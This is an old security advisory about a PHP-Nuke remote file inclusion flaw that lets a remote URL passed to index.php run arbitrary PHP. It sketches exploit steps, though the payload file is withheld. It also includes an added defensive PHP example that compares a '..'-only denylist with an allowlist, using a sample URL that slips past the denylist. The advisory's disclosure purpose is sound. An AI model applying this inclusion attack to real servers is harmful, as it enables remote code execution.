Flexible Content Management System


Another PHP Nuke Bug

Contributed by while we are not vul on Jan 18, 2002 - 05:29 PM

Subject: PHP-Nuke allows Command Execution & Much more

Hi All!

I've found a serious security flaw in PHP-Nuke. It allows a user to execute any PHP code.

The flaw is in index.php's include file feature. It allows including files like index.php?file=file

It prevents users from including ..'s in URLs, but it didn't prevent users from entering http://-URLs. Remember PHP's remote get feature...

How to exploit:

Upload this file to some free web space provider or set up your own server:

Then just requesting http://insecure-server/index.php?file= will execute ls -al command.

I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

Vendor status:

I contacted the author on 28.12.2001 and he hasn't
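
The filter gap this advisory describes, shown from the defender's side as an added example (it is not PHP-Nuke's code and not part of the original post): a check that only rejects ".." next to an allowlist lookup, plus a check of PHP's URL-include setting. The function names, module map and sample inputs are constructed for illustration.

```php
<?php
// Added example, not PHP-Nuke code. Function names, the module map and the
// sample inputs are constructed for illustration.

// Denylist of the kind the advisory describes: only ".." is rejected.
function denylist_allows(string $file): bool
{
    return strpos($file, '..') === false;
}

// Allowlist: the parameter is a lookup key; the path passed to include()
// always comes from this fixed map, never from the request.
const MODULES = [
    'news'  => 'modules/news.php',
    'forum' => 'modules/forum.php',
];

function allowlist_resolve(string $file): ?string
{
    return MODULES[$file] ?? null;
}

$samples = [
    'news',                             // intended use
    '../config.php',                    // traversal, caught by both checks
    'http://remote.example/page.txt',   // URL, passes the denylist
];

foreach ($samples as $value) {
    printf(
        "%-34s denylist=%-7s allowlist=%s\n",
        $value,
        denylist_allows($value) ? 'allowed' : 'blocked',
        allowlist_resolve($value) ?? 'blocked'
    );
}

// Second layer: on PHP 5.2 and later, include() fetches URLs only when
// allow_url_include is enabled (it is off by default).
$flag = strtolower((string) ini_get('allow_url_include'));
printf(
    "allow_url_include is %s\n",
    in_array($flag, ['1', 'on', 'true', 'yes'], true) ? 'ON (disable it)' : 'off'
);
```

Only the allowlist blocks the URL input; the denylist lets it through because the string contains no "..".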